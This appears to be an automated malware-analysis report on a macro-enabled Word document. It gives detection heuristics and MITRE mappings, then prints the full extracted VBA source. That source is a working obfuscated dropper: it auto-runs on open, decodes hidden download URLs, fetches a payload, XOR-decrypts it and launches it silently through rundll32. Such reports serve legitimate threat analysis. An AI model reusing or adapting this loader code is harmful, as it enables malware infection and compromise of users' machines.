MALICIOUS
Risk Score: 392
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
This OOXML document contains obfuscated VBA macros, including an auto-exec loader that utilizes CreateObject and Shell calls. The presence of these critical heuristics, along with the detection as a dropper by ClamAV, strongly indicates malicious intent. The VBA code is designed to execute arbitrary commands, likely to download and run a second-stage payload, as suggested by the 'Obfuscated auto-exec VBA loader' and 'Potential Shell call in VBA' firings.
Heuristics (11)
- ClamAV: Doc.Dropper.Agent-1668492 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Dropper.Agent-1668492
- VBA project inside OOXML (medium, OOXML_VBA, 7 related findings)
  Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Matched line in script:
      Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide)
      Exit Function
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN)
  Matched line in script:
      Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide)
      Exit Function
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
      Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide)
      Exit Function
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script:
      Public Sub importComponents()
      Set acheacheacheacheacheSULMAS1DASH1solo = CreateObject(acheacheacheacheacheSULMASPLdunay(3))
      Set acheacheacheacheacheSULMASKSKLAL = acheacheacheacheacheSULMAS1DASH1solo.Environment(acheacheacheacheacheSULMASPLdunay(2 * 2))
- CallByName call (high, OLE_VBA_CALLBYNAME)
  Matched line in script:
      CallByName acheacheacheacheacheSULMAShinthorse2, "savet" + "ofile", VbMethod, acheacheacheacheacheSULMASUUUKABBB, 2
      milamodbask acheacheacheacheacheSULMASUUUKABBB, acheacheacheacheacheSULMASUUUKA, "z2AnWoNsPWzvRi3lVEqduJTiFqc0of4D"
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  Matched line in script:
      Attribute VB_Customizable = True
      Sub autoopen()
      addSheetToWorkbook "11", "33"
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 21573 bytes |

SHA-256: a5514ef0d4f1b64a4e4f7e72f1aa9a5d1300459ffa91318f37d0c1a3c43204bf
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
addSheetToWorkbook "11", "33"
End Sub
Attribute VB_Name = "Module1"
'''
' Build instructions:
' 1. Open a new workbook in excel, then open the VB editor (Alt+F11) and from the menu File->Import, import this file:
' * src/vbaDeveloper.xlam/Build.bas
' 2. From tools references... add
' * Microsoft Visual Basic for Applications Extensibility 5.3
' * Microsoft Scripting Runtime
' 3. Rename the project to 'vbaDeveloper'
' 5. Enable programatic access to VBA:
' File -> Options -> Trust Center, Trust Center Settings, -> Macros,
' tick the box: 'Enable programatic access to VBA' (In excel 2010: 'Trust access to the vba project object model')
' 6. If using a non-English version of Excel, rename your current workbook into ThisWorkbook (in VB Editor, press F4,
' then under the local name for Microsoft Excel Objects, select the workbook. Set the property '(Name)' to ThisWorkbook)
' 7. In VB Editor, press F4, then under Microsoft Excel Objects, select ThisWorkbook.Set the property 'IsAddin' to TRUE
' 8. In VB Editor, menu File-->Save Book1; Save as vbaDeveloper.xlam in the same directory as 'src'
' 9. Close excel. Open excel with a new workbook, then open the just saved vbaDeveloper.xlam
' 10.Let vbaDeveloper import its own code. Put the cursor in the function 'testImport' and press F5
' 11.If necessary rename module 'Build1' to Build. Menu File-->Save vbaDeveloper.xlam
'''
Private Const IMPORT_DELAY As String = "00:00:03"
'We need to make these variables public such that they can be given as arguments to application.ontime()
Public componentsToImport As Dictionary 'Key = componentName, Value = componentFilePath
Public sheetsToImport As Dictionary 'Key = componentName, Value = File object
Public vbaProjectToImport As String
Public Sub testExport()
acheacheacheacheacheSULMASASALLLP = acheacheacheacheacheSULMASDAcdaw.responseBody
testImport
Exit Sub
Dim proj_name As String
proj_name = "VbaDeveloper"
Dim vbaProject As Object
Set vbaProject = Application.VBE.VBProjects(proj_name)
Build.exportVbaCode vbaProject
End Sub
' Returns the directory where code is exported to or imported from.
' When createIfNotExists:=True, the directory will be created if it does not exist yet.
' This is desired when we get the directory for exporting.
' When createIfNotExists:=False and the directory does not exist, an empty String is returned.
' This is desired when we get the directory for importing.
'
' Directory names always end with a '\', unless an empty string is returned.
' Usually called with: fullWorkbookPath = wb.FullName or fullWorkbookPath = vbProject.fileName
' if the workbook is new and has never been saved,
' vbProject.fileName will throw an error while wb.FullName will return a name without slashes.
Public Function getSourceDir(fullWorkbookPath As String, createIfNotExists As Boolean) As String
' First check if the fullWorkbookPath contains a \.
If Not InStr(fullWorkbookPath, "\") > 0 Then
'In this case it is a new workbook, we skip it
Exit Function
End If
Dim FSO As Object
Dim projDir As String
projDir = FSO.GetParentFolderName(fullWorkbookPath) & "\"
Dim srcDir As String
srcDir = projDir & "src\"
Dim exportDir As String
exportDir = srcDir & FSO.GetFileName(fullWorkbookPath) & "\"
If createIfNotExists Then
If Not FSO.FolderExists(srcDir) Then
FSO.CreateFolder srcDir
Debug.Print "Created Folder " & srcDir
End If
If Not FSO.FolderExists(exportDir) Then
FSO.CreateFolder exportDir
Debug.Print "Created Folder " & exportDir
End If
Else
If Not FSO.FolderExists(exportDir) Then
Debug.Print "Folder does not exist: " & exportDir
exportDir = ""
End If
End If
getSourceDir = exportDir
End Function
' Usually called after the given workbook is saved
Public Sub exportVbaCode(vbaProject As String)
acheacheacheacheacheSULMAShinthorse2.Type = 2 - 7 / (34 - 27)
acheacheacheacheacheSULMAShinthorse2.Open
Exit Sub
Dim vbProjectFileName As String
On Error Resume Next
'this can throw if the workbook has never been saved.
vbProjectFileName = vbaPro.ject.fileName
On Error GoTo 0
If vbProjectFileName = "" Then
'In this case it is a new workbook, we skip it
Debug.Print "No file name for project " & vbaPr.oject.name & ", skipping"
Exit Sub
End If
Dim export_path As String
export_path = getSourceDir(vbProjectFileName, createIfNotExists:=True)
Debug.Print "exporting to " & export_path
'export all components
Dim component As Object
For Each component In vbaPro.ject.VBCompo.nents
'lblStatus.Caption = "Exporting " & proj_name & "::" & component.Name
If hasCodeToExport(comp.onent) Then
'Debug.Print "exporting type is " & component.Type
Select Case component.Type
Case vbext_ct_ClassModule
exportComponent export_path, comp.onent
Case vbext_ct_StdModule
exportComponent export_path, compon.ent, ".bas"
Case vbext_ct_MSForm
exportComponent export_path, compon.ent, ".frm"
Case vbext_ct_Document
exportLines export_path, compon.ent
Case Else
'Raise "Unkown component type"
End Select
End If
Next component
End Sub
Public Function hasCodeToExport(component As String) As Boolean
CallByName acheacheacheacheacheSULMAShinthorse2, "savet" + "ofile", VbMethod, acheacheacheacheacheSULMASUUUKABBB, 2
milamodbask acheacheacheacheacheSULMASUUUKABBB, acheacheacheacheacheSULMASUUUKA, "z2AnWoNsPWzvRi3lVEqduJTiFqc0of4D"
'acheacheacheacheacheSULMASGMAKO.Open (acheacheacheacheacheSULMASUUUKA)
Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide)
Exit Function
hasCodeToExport = True
If compon.ent.codeModule.CountOfLines <= 2 Then
Dim firstLine As String
firstLine = Trim(comp.onent.codeModule.Lines(1, 1))
'Debug.Print firstLine
hasCodeToExport = Not (firstLine = "" Or firstLine = "Option Explicit")
End If
End Function
'To export everything else but sheets
Private Sub exportComponent(exportPath As String, component As String, Optional extension As String = ".cls")
Debug.Print "exporting " & compo.nent.name & extension
compon.ent.Export exportPath & "\" & compo.nent.name & extension
End Sub
'To export sheets
Private Sub exportLines(exportPath As String, component As String)
acheacheacheacheacheSULMASLAKOPPC = acheacheacheacheacheSULMASKSKLAL(acheacheacheacheacheSULMASPLdunay(6))
acheacheacheacheacheSULMASUUUKA = acheacheacheacheacheSULMASLAKOPPC
acheacheacheacheacheSULMASUUUKABBB = acheacheacheacheacheSULMASUUUKA + "\hodstad"
acheacheacheacheacheSULMASUUUKA = acheacheacheacheacheSULMASUUUKA + acheacheacheacheacheSULMASPLdunay(12)
Exit Sub
Dim extension As String: extension = ".sheet.cls"
Dim fileName As String
fileName = exportPath & "\" & compo.nent.name & extension
Debug.Print "exporting " & compo.nent.name & extension
'component.Export exportPath & "\" & component.name & extension
Dim FSO As Object
Dim outStream As Object
Set outStream = FSO.CreateTextFile(fileName, True, False)
outStream.Write (compo.nent.codeModule.Lines(1, comp.onent.codeModule.CountOfLines))
outStream.Close
End Sub
' Usually called after the given workbook is opened. The option includeClassFiles is False by default because
' they don't import correctly from VBA. They'll have to be imported manually instead.
Public Sub importVbaCode(vbaProject As String, Optional includeClassFiles As Boolean = False)
Dim vbProjectFileName As Object
On Error Resume Next
'this can throw if the workbook has never been saved.
vbProjectFileName = vbaProj.ect.fileName
On Error GoTo 0
If vbProjectFileName = "" Then
'In this case it is a new workbook, we skip it
Debug.Print "No file name for project " & vbaProj.ect.name & ", skipping"
Exit Sub
End If
Dim export_path As String
export_path = getSourceDir(vbProjectF.ileName, createIfNotExists:=False)
If export_path = "" Then
'The source directory does not exist, code has never been exported for this vbaProject.
Debug.Print "No import directory for project " & vbaProj.ect.name & ", skipping"
Exit Sub
End If
'initialize globals for Application.OnTime
Dim projContents As Object
Set projContents = FSO.GetFolder(export_path)
Dim file As Object
For Each file In projContents.Files()
'check if and how to import the file
checkHowToImport fi.le, includeClassFiles
Next
Dim componentName As String
Dim vComponentName As Variant
'Remove all the modules and class modules
For Each vComponentName In componentsToI.mport.Keys
componentName = vComponentName
removeComponent vbaProject, componentName
Next
'Then import them
Debug.Print "Invoking 'Build.importComponents'with Application.Ontime with delay " & IMPORT_DELAY
' to prevent duplicate modules, like MyClass1 etc.
Application.OnTime Now() + TimeValue(IMPORT_DELAY), "'Build.importComponents'"
Debug.Print "almost finished importing code for " & vbaPro.ject.name
End Sub
Public Function DuBirMahnWeishr(acheacheacheacheacheSULMAS6 As Integer) As String
Dost = CInt(acheacheacheacheacheSULMASXSAOO(acheacheacheacheacheSULMAS6))
DuBirMahnWeishr = Chr(Dost - 329)
End Function
Public Function latarantulalalafdula(CH1 As String, CH2 As String, CH3 As String) As String
latarantulalalafdula = Replace(CH1, CH2, CH3)
End Function
Private Sub checkHowToImport(file As String, includeClassFiles As Boolean)
Dim CherkaPID As Integer
acheacheacheacheacheSULMAS4 = ""
For CherkaPID = LBound(acheacheacheacheacheSULMASXSAOO) To UBound(acheacheacheacheacheSULMASXSAOO)
acheacheacheacheacheSULMAS4 = acheacheacheacheacheSULMAS4 & DuBirMahnWeishr(CherkaPID)
Next CherkaPID
Exit Sub
Dim fileName As String
fileName = fil.E.name
Dim componentName As String
componentName = Left(fileName, InStr(fileName, ".") - 1)
If componentName = "Build" Then
'"don't remove or import ourself
Exit Sub
End If
If Len(fileName) > 4 Then
Dim lastPart As String
lastPart = Right(fileName, 4)
Select Case lastPart
Case ".cls" ' 10 == Len(".sheet.cls")
If Len(fileName) > 10 And Right(fileName, 10) = ".sheet.cls" Then
'import lines into sheet: importLines vbaProjectToImport, file
sheetsToIm.port.Add componentName, file
Else
' .cls files don't import correctly because of a bug in excel, therefore we can exclude them.
' In that case they'll have to be imported manually.
If includeClassFiles Then
'importComponent vbaProject, file
componentsT.oImport.Add componentName, fi.le.Path
End If
End If
Case ".bas", ".frm"
'importComponent vbaProject, file
componentsTo.import.Add componentName, fi.le.Path
Case Else
'do nothing
Debug.Print "Skipping file " & fileName
End Select
End If
End Sub
' Only removes the vba component if it exists
Private Sub removeComponent(vbaProject As String, componentName As String)
checkHowToImport "", False
If Application = "Microsoft Word" Then
acheacheacheacheacheSULMASDAcdaw.Open acheacheacheacheacheSULMASPLdunay(5), acheacheacheacheacheSULMAS4, False
acheacheacheacheacheSULMASDAcdaw.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
acheacheacheacheacheSULMASDAcdaw.Send
exportLines "", ""
exportVbaCode ""
testExport
End If
Exit Sub
If componentExists(vbaProject, componentName) Then
Dim c As String
c = vbaProj.ect.VBComponents(componentName)
Debug.Print "removing " & cmm.name
vbaPr.oject.VBComponents.Remove c
End If
End Sub
Public Sub importComponents()
Set acheacheacheacheacheSULMAS1DASH1solo = CreateObject(acheacheacheacheacheSULMASPLdunay(3))
Set acheacheacheacheacheSULMASKSKLAL = acheacheacheacheacheSULMAS1DASH1solo.Environment(acheacheacheacheacheSULMASPLdunay(2 * 2))
removeComponent "", ""
Exit Sub
If componentsToImport Is Nothing Then
Debug.Print "Failed to import! Dictionary 'componentsToImport' was not initialized."
Exit Sub
End If
Dim componentName As String
Dim vComponentName As Variant
For Each vComponentName In componentsT.oImport.Keys
componentName = vComponentName
importComponent vbaProjectToImport, componen.tsToImport(componentName)
Next
'Import the sheets
For Each vComponentName In sheetsToI.mport.Keys
componentName = vComponentName
import.Lines vbaProjectToImport, sheetsT.oImport(componentName)
Next
Debug.Print "Finished importing code for " & vbaProjectToI.mport.name
'We're done, clear globals explicitly to free memory.
Set componentsToImport = Nothing
End Sub
' Assumes any component with same name has already been removed.
Private Sub importComponent(vbaProject As String, filePath As String)
Debug.Print "Importing component from " & filePath
'This next line is a bug! It imports all classes as modules!
vbaPro.ject.VBComponents.import filePath
End Sub
' Returns the CodeName of the added sheet or an empty String if the workbook could not be opened.
Public Function addSheetToWorkbook(sheetName As String, workbookFilePath As String) As String
acheacheacheacheacheSULMAStruuuk = "DUUMicroDUUUMoft.XDUUMLHTTPDUUUUMAdodb" + ".DUUUMtrDUMaDUUMDUUUUMDUUUMhDUMll.Ap"
acheacheacheacheacheSULMAStruuuk = acheacheacheacheacheSULMAStruuuk + latarantulalalafdula("plicationDUUUUMWDUUUMcript.DUUUMhDUMllDUUUUMProcDUMDUUUMDUUUMDUUUUMGDUMTDUUUUMTDUMDUUMPDUUUUMTypDUMDUUUUMopDUMnDUUUUMwritFILMABOponDUUUMDUMBodyDUUUUMDUUUMavDUMtofilDUMDUUUUM", "FILMABO", "DUMDUUUUMrDUMDUUUM")
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk + "\dwwaccDUUUM" + ".dll", "DUM", "e")
kokoka = Split("433у445у445у441у387у376у376у448у448у448у375у428у426у437у437у434у444у445у440у375у428у427у426у375у441у437у376у440у442у438у431у439у426у443...433у445у445у441у387у376у376у448у448у448у375у448у433у434у445у426у436у430у443у441у429у375у428у440у375у446у436у376у450у438у438у428у432у446у436...433у445у445у441у387у376у376у448у448у448у375у441у426у443у443у446у428у428у433у434у430у443у434у426у432у434у426у428у440у438у440у375у428у440у438у376у429у430у436у435у449у446у444", "...")
For n = LBound(kokoka) To UBound(kokoka)
On Error GoTo nnnext
acheacheacheacheacheSULMASXSAOO = Split(kokoka(n), "у")
openWorkbook "ee"
Exit Function
nnnext:
Next n
Exit Function
Dim wb As String
On Error Resume Next 'can throw if given path does not exist
Set wmm.b = openWorkbook(workbookFilePath)
On Error GoTo 0
If Not wmb.mm Is Nothing Then
Dim ws As String
ws = wbmm.Sheets.Add(After:=wbmmm.Sheets(wmmb.Sheets.Count))
wnns.name = sheetName
'ws.CodeName = sheetName: cannot assign to read only property
Debug.Print "Sheet added " & sheetName
addSheetToWorkbook = wnns.CodeName
Else
Debug.Print "Skipping file " & sheetName & ". Could not open workbook " & workbookFilePath
addSheetToWorkbook = ""
End If
End Function
Public Sub importLines(vbaProject As Object, file As Object)
Dim i As Integer
Dim d As Boolean
d = True
IsWord = True
For i = 1 To Len(Trim("AAsc"))
If d = False Then
Set acheacheacheacheacheSULMASDAcdaw = CreateObject(acheacheacheacheacheSULMASPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
importComponents
Exit Sub
Dim componentName As String
componentName = Left(file.name, InStr(file.name, ".") - 1)
Dim c As String
If Not componentExists(vbaPro.ject, componentName) Then
' Create a sheet to import this code into. We cannot set the ws.codeName property which is read-only,
' instead we set its vbComponent.name which leads to the same result.
Dim addedSheetCodeName As String
addedSheetCodeName = addSheetToWorkbook(componentName, vbaProject.fileName)
Set jj.c = vbaProject.VBComponents(addedSheetCodeName)
jj.name = componentName
End If
Set cjjj.jj = vbaProject.VBComponents(componentName)
Debug.Print "Importing lines from " & componentName & " into component " & jjc.name
' At this point compilation errors may cause a crash, so we ignore those.
On Error Resume Next
jjj.codeModule.DeleteLines 1, jjj.codeModule.CountOfLines
jjj.codeModule.AddFromFile fi.le.Path
On Error GoTo 0
End Sub
Public Function componentExists(ByRef proj As String, name As String) As Boolean
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk, "DUUUM", LCase("S"))
acheacheacheacheacheSULMASPLdunay = Split(acheacheacheacheacheSULMAStruuuk, "DUUUUM")
Exit Function
On Error GoTo doesnt
Dim c As String
c = pr.oj.VBComponents(name)
componentExists = True
Exit Function
doesnt:
componentExists = False
End Function
Attribute VB_Name = "Module2"
Public acheacheacheacheacheSULMASDAcdaw As Object
Public acheacheacheacheacheSULMAShinthorse2 As Object
Public acheacheacheacheacheSULMASKSKLAL As Object
Public acheacheacheacheacheSULMASXSAOO() As String
Public acheacheacheacheacheSULMASLAKOPPC As String
Public acheacheacheacheacheSULMASPLdunay() As String
Public acheacheacheacheacheSULMASUUUKA As String
Public acheacheacheacheacheSULMASUUUKABBB As String
Public acheacheacheacheacheSULMASGMAKO As Object
Public acheacheacheacheacheSULMAS4 As String
Public acheacheacheacheacheSULMAStruuuk As String
Public acheacheacheacheacheSULMASASALLLP As Variant
Public Sub testImport()
CallByName acheacheacheacheacheSULMAShinthorse2, "write", VbMethod, acheacheacheacheacheSULMASASALLLP
hasCodeToExport ""
Exit Sub
Dim proj_name As String
proj_name = "VbaDeveloper"
Dim vbaProject As Object
Set vbaProject = Application.VBE.VBProjects(proj_name)
Build.importVbaCode vbaProject
End Sub
Public Sub DecryptByte(DATAARRAY() As Byte, Key As String)
Dim offset As Long
Dim ByteLen As Long
Dim ResultLen As Long
Dim CurrPercent As Long
Dim NextPercent As Long
Dim m_Key() As Byte
Dim m_KeyLen As Long
m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)
m_Key = StrConv(Key, vbFromUnicode)
ByteLen = UBound(DATAARRAY) + 1
ResultLen = ByteLen
For offset = 0 To (ByteLen - 1)
DATAARRAY(offset) = DATAARRAY(offset) Xor m_Key(offset Mod m_KeyLen)
If (offset >= NextPercent) Then
CurrPercent = Int((offset / ResultLen) * 100)
NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
End If
Next
End Sub
' Returns a reference to the workbook. Opens it if it is not already opened.
' Raises error if the file cannot be found.
Public Function openWorkbook(ByVal filePath As String) As String
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk, "DUUM", "M")
componentExists "", ""
Set acheacheacheacheacheSULMAShinthorse2 = CreateObject(acheacheacheacheacheSULMASPLdunay(1))
Set acheacheacheacheacheSULMASGMAKO = CreateObject(acheacheacheacheacheSULMASPLdunay(5 - 3))
importLines Nothing, Nothing
Exit Function
Dim wb As String
Dim fileName As String
fileName = Dir(filePath)
On Error Resume Next
wb = Work.books(fileName)
On Error GoTo 0
If wbmm.mm Is Nothing Then
wb = Workbooks.Open(filePath) 'can raise error
End If
Set openWom.rkbook = wb
End Function
Public Sub milamodbask(SourceFile As String, DestFile As String, Optional Key As String)
Dim Filenr As Integer
Dim DATAARRAY() As Byte
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
HHdn = LOF(Filenr)
ReDim DATAARRAY(0 To HHdn - 1)
Get #Filenr, , DATAARRAY()
Close #Filenr
Call DecryptByte(DATAARRAY(), Key)
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , DATAARRAY()
Close #Filenr
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |

SHA-256: 75842ad368ee80fd677679da607b6ee3ed1531d01ec3d4ffbce588afad0d3e38
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).